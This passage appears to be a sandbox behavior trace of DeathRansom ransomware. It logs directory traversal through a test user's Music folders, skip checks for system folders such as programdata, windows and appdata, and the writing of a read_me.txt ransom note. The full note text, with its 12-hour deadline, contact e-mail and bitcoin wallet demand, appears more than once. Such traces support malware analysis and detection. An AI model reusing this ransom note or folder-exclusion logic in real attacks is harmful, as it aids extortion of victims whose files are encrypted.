ftCreationTime.dwLowDateTime=0xa5599f40, ftCreationTime.dwHighDateTime=0x1d4cd32, ftLastAccessTime.dwLowDateTime=0x93b8d120, ftLastAccessTime.dwHighDateTime=0x1d4c995, ftLastWriteTime.dwLowDateTime=0x93b8d120, ftLastWriteTime.dwHighDateTime=0x1d4c995, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.759] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\..") returned 85 [0075.759] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.759] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc001fb50, ftCreationTime.dwHighDateTime=0x1d4ca65, ftLastAccessTime.dwLowDateTime=0x231757d0, ftLastAccessTime.dwHighDateTime=0x1d4c8c2, ftLastWriteTime.dwLowDateTime=0x231757d0, ftLastWriteTime.dwHighDateTime=0x1d4c8c2, nFileSizeHigh=0x0, nFileSizeLow=0x6b58, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="0gMoTR0qq.mp3", cAlternateFileName="0GMOTR~1.MP3")) returned 1 [0075.759] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\0gMoTR0qq.mp3") returned 96 [0075.759] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98039ff0, ftCreationTime.dwHighDateTime=0x1d4ced4, ftLastAccessTime.dwLowDateTime=0xb1c91ab0, ftLastAccessTime.dwHighDateTime=0x1d4cdf7, ftLastWriteTime.dwLowDateTime=0xb1c91ab0, ftLastWriteTime.dwHighDateTime=0x1d4cdf7, nFileSizeHigh=0x0, nFileSizeLow=0xeabf, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="BquehE5.m4a", cAlternateFileName="")) returned 1 [0075.759] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\BquehE5.m4a") returned 94 [0075.759] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98039ff0, ftCreationTime.dwHighDateTime=0x1d4ced4, ftLastAccessTime.dwLowDateTime=0xb1c91ab0, ftLastAccessTime.dwHighDateTime=0x1d4cdf7, ftLastWriteTime.dwLowDateTime=0xb1c91ab0, ftLastWriteTime.dwHighDateTime=0x1d4cdf7, nFileSizeHigh=0x0, nFileSizeLow=0xeabf, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="BquehE5.m4a", cAlternateFileName="")) returned 0 [0075.759] FindClose (in: hFindFile=0x7cfea68 | out: hFindFile=0x7cfea68) returned 1 [0075.759] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\read_me.txt") returned 94 [0075.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\0bfits5we\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x764 [0075.760] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.760] WriteFile (in: hFile=0x764, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d304, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d304*=0x6b3, lpOverlapped=0x0) returned 1 [0075.761] CloseHandle (hObject=0x764) returned 1 [0075.761] GetProcessHeap () returned 0x4f10000 [0075.761] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d610c0 | out: hHeap=0x4f10000) returned 1 [0075.761] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17f1d060, ftCreationTime.dwHighDateTime=0x1d4d033, ftLastAccessTime.dwLowDateTime=0x1eeb56e0, ftLastAccessTime.dwHighDateTime=0x1d4ccdf, ftLastWriteTime.dwLowDateTime=0x1eeb56e0, ftLastWriteTime.dwHighDateTime=0x1d4ccdf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="A0YKGsoY8M31ETQ", cAlternateFileName="A0YKGS~1")) returned 1 [0075.761] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ") returned 88 [0075.761] lstrcmpW (lpString1="A0YKGsoY8M31ETQ", lpString2="..") returned 1 [0075.761] lstrcmpW (lpString1="A0YKGsoY8M31ETQ", lpString2=".") returned 1 [0075.761] StrStrW (lpFirst="a0ykgsoy8m31etq", lpSrch="programdata") returned 0x0 [0075.761] StrStrW (lpFirst="a0ykgsoy8m31etq", lpSrch="$recycle.bin") returned 0x0 [0075.761] StrStrW (lpFirst="a0ykgsoy8m31etq", lpSrch="program files") returned 0x0 [0075.761] StrStrW (lpFirst="a0ykgsoy8m31etq", lpSrch="windows") returned 0x0 [0075.761] StrStrW (lpFirst="a0ykgsoy8m31etq", lpSrch="all users") returned 0x0 [0075.761] StrStrW (lpFirst="a0ykgsoy8m31etq", lpSrch="appdata") returned 0x0 [0075.761] GetProcessHeap () returned 0x4f10000 [0075.761] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ad0070 [0075.761] lstrcpyW (in: lpString1=0x8ad0070, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ" [0075.761] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 72 [0075.761] QueueUserWorkItem (Function=0x40a710, Context=0x8ad0070, Flags=0x0) returned 1 [0075.761] GetProcessHeap () returned 0x4f10000 [0075.761] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d610c0 [0075.761] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\*") returned 90 [0075.761] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\*", lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17f1d060, ftCreationTime.dwHighDateTime=0x1d4d033, ftLastAccessTime.dwLowDateTime=0x1eeb56e0, ftLastAccessTime.dwHighDateTime=0x1d4ccdf, ftLastWriteTime.dwLowDateTime=0x1eeb56e0, ftLastWriteTime.dwHighDateTime=0x1d4ccdf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfea68 [0075.762] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\.") returned 90 [0075.762] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.762] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.762] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17f1d060, ftCreationTime.dwHighDateTime=0x1d4d033, ftLastAccessTime.dwLowDateTime=0x1eeb56e0, ftLastAccessTime.dwHighDateTime=0x1d4ccdf, ftLastWriteTime.dwLowDateTime=0x1eeb56e0, ftLastWriteTime.dwHighDateTime=0x1d4ccdf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.762] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\..") returned 91 [0075.762] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.762] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a37680, ftCreationTime.dwHighDateTime=0x1d4d4d5, ftLastAccessTime.dwLowDateTime=0xd6ce2e00, ftLastAccessTime.dwHighDateTime=0x1d4cf40, ftLastWriteTime.dwLowDateTime=0xd6ce2e00, ftLastWriteTime.dwHighDateTime=0x1d4cf40, nFileSizeHigh=0x0, nFileSizeLow=0x44dd, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="aLpSkpnAOV.wav", cAlternateFileName="ALPSKP~1.WAV")) returned 1 [0075.762] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\aLpSkpnAOV.wav") returned 103 [0075.762] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e537bb0, ftCreationTime.dwHighDateTime=0x1d4c632, ftLastAccessTime.dwLowDateTime=0x18c68c00, ftLastAccessTime.dwHighDateTime=0x1d4d395, ftLastWriteTime.dwLowDateTime=0x18c68c00, ftLastWriteTime.dwHighDateTime=0x1d4d395, nFileSizeHigh=0x0, nFileSizeLow=0x10ce9, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DAeR1.mp3", cAlternateFileName="")) returned 1 [0075.762] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\DAeR1.mp3") returned 98 [0075.762] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1bcf780, ftCreationTime.dwHighDateTime=0x1d4c803, ftLastAccessTime.dwLowDateTime=0x6906d700, ftLastAccessTime.dwHighDateTime=0x1d4c67b, ftLastWriteTime.dwLowDateTime=0x6906d700, ftLastWriteTime.dwHighDateTime=0x1d4c67b, nFileSizeHigh=0x0, nFileSizeLow=0x15520, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="HQLOEn1NqpfTg1W.wav", cAlternateFileName="HQLOEN~1.WAV")) returned 1 [0075.762] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\HQLOEn1NqpfTg1W.wav") returned 108 [0075.762] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x589e56c0, ftCreationTime.dwHighDateTime=0x1d4d2c1, ftLastAccessTime.dwLowDateTime=0xfb273750, ftLastAccessTime.dwHighDateTime=0x1d4d0e0, ftLastWriteTime.dwLowDateTime=0xfb273750, ftLastWriteTime.dwHighDateTime=0x1d4d0e0, nFileSizeHigh=0x0, nFileSizeLow=0x3ada, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="l6ln9j1_D55o.mp3", cAlternateFileName="L6LN9J~1.MP3")) returned 1 [0075.762] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\l6ln9j1_D55o.mp3") returned 105 [0075.762] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45d7b110, ftCreationTime.dwHighDateTime=0x1d4d0f7, ftLastAccessTime.dwLowDateTime=0x27311c50, ftLastAccessTime.dwHighDateTime=0x1d4ca63, ftLastWriteTime.dwLowDateTime=0x27311c50, ftLastWriteTime.dwHighDateTime=0x1d4ca63, nFileSizeHigh=0x0, nFileSizeLow=0x9d60, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Lzol.m4a", cAlternateFileName="")) returned 1 [0075.762] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\Lzol.m4a") returned 97 [0075.762] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18683930, ftCreationTime.dwHighDateTime=0x1d4ced0, ftLastAccessTime.dwLowDateTime=0x7d543690, ftLastAccessTime.dwHighDateTime=0x1d4c63e, ftLastWriteTime.dwLowDateTime=0x7d543690, ftLastWriteTime.dwHighDateTime=0x1d4c63e, nFileSizeHigh=0x0, nFileSizeLow=0x188f4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ref_Ha9y0KFA_ID.m4a", cAlternateFileName="REF_HA~1.M4A")) returned 1 [0075.762] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\ref_Ha9y0KFA_ID.m4a") returned 108 [0075.762] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18683930, ftCreationTime.dwHighDateTime=0x1d4ced0, ftLastAccessTime.dwLowDateTime=0x7d543690, ftLastAccessTime.dwHighDateTime=0x1d4c63e, ftLastWriteTime.dwLowDateTime=0x7d543690, ftLastWriteTime.dwHighDateTime=0x1d4c63e, nFileSizeHigh=0x0, nFileSizeLow=0x188f4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ref_Ha9y0KFA_ID.m4a", cAlternateFileName="REF_HA~1.M4A")) returned 0 [0075.762] FindClose (in: hFindFile=0x7cfea68 | out: hFindFile=0x7cfea68) returned 1 [0075.762] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\read_me.txt") returned 100 [0075.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\a0ykgsoy8m31etq\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x764 [0075.763] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.763] WriteFile (in: hFile=0x764, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d304, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d304*=0x6b3, lpOverlapped=0x0) returned 1 [0075.764] CloseHandle (hObject=0x764) returned 1 [0075.764] GetProcessHeap () returned 0x4f10000 [0075.764] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d610c0 | out: hHeap=0x4f10000) returned 1 [0075.764] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e8c3450, ftCreationTime.dwHighDateTime=0x1d4c791, ftLastAccessTime.dwLowDateTime=0xa1d07730, ftLastAccessTime.dwHighDateTime=0x1d4d111, ftLastWriteTime.dwLowDateTime=0xa1d07730, ftLastWriteTime.dwHighDateTime=0x1d4d111, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="c3ErMl5xQUkjb", cAlternateFileName="C3ERML~1")) returned 1 [0075.764] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb") returned 86 [0075.764] lstrcmpW (lpString1="c3ErMl5xQUkjb", lpString2="..") returned 1 [0075.764] lstrcmpW (lpString1="c3ErMl5xQUkjb", lpString2=".") returned 1 [0075.764] StrStrW (lpFirst="c3erml5xqukjb", lpSrch="programdata") returned 0x0 [0075.764] StrStrW (lpFirst="c3erml5xqukjb", lpSrch="$recycle.bin") returned 0x0 [0075.764] StrStrW (lpFirst="c3erml5xqukjb", lpSrch="program files") returned 0x0 [0075.764] StrStrW (lpFirst="c3erml5xqukjb", lpSrch="windows") returned 0x0 [0075.764] StrStrW (lpFirst="c3erml5xqukjb", lpSrch="all users") returned 0x0 [0075.764] StrStrW (lpFirst="c3erml5xqukjb", lpSrch="appdata") returned 0x0 [0075.764] GetProcessHeap () returned 0x4f10000 [0075.764] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d610c0 [0075.764] lstrcpyW (in: lpString1=0x8d610c0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb" [0075.764] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 73 [0075.764] QueueUserWorkItem (Function=0x40a710, Context=0x8d610c0, Flags=0x0) returned 1 [0075.764] GetProcessHeap () returned 0x4f10000 [0075.764] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d710c8 [0075.765] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb\\*") returned 88 [0075.765] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb\\*", lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e8c3450, ftCreationTime.dwHighDateTime=0x1d4c791, ftLastAccessTime.dwLowDateTime=0xa1d07730, ftLastAccessTime.dwHighDateTime=0x1d4d111, ftLastWriteTime.dwLowDateTime=0xa1d07730, ftLastWriteTime.dwHighDateTime=0x1d4d111, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfea68 [0075.765] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb\\.") returned 88 [0075.765] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.765] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.765] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e8c3450, ftCreationTime.dwHighDateTime=0x1d4c791, ftLastAccessTime.dwLowDateTime=0xa1d07730, ftLastAccessTime.dwHighDateTime=0x1d4d111, ftLastWriteTime.dwLowDateTime=0xa1d07730, ftLastWriteTime.dwHighDateTime=0x1d4d111, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.765] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb\\..") returned 89 [0075.765] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.765] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7ec3810, ftCreationTime.dwHighDateTime=0x1d4d151, ftLastAccessTime.dwLowDateTime=0x55f96730, ftLastAccessTime.dwHighDateTime=0x1d4d24d, ftLastWriteTime.dwLowDateTime=0x55f96730, ftLastWriteTime.dwHighDateTime=0x1d4d24d, nFileSizeHigh=0x0, nFileSizeLow=0x12ab5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="gKB91HPUi4W1PdPGj.mp3", cAlternateFileName="GKB91H~1.MP3")) returned 1 [0075.765] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 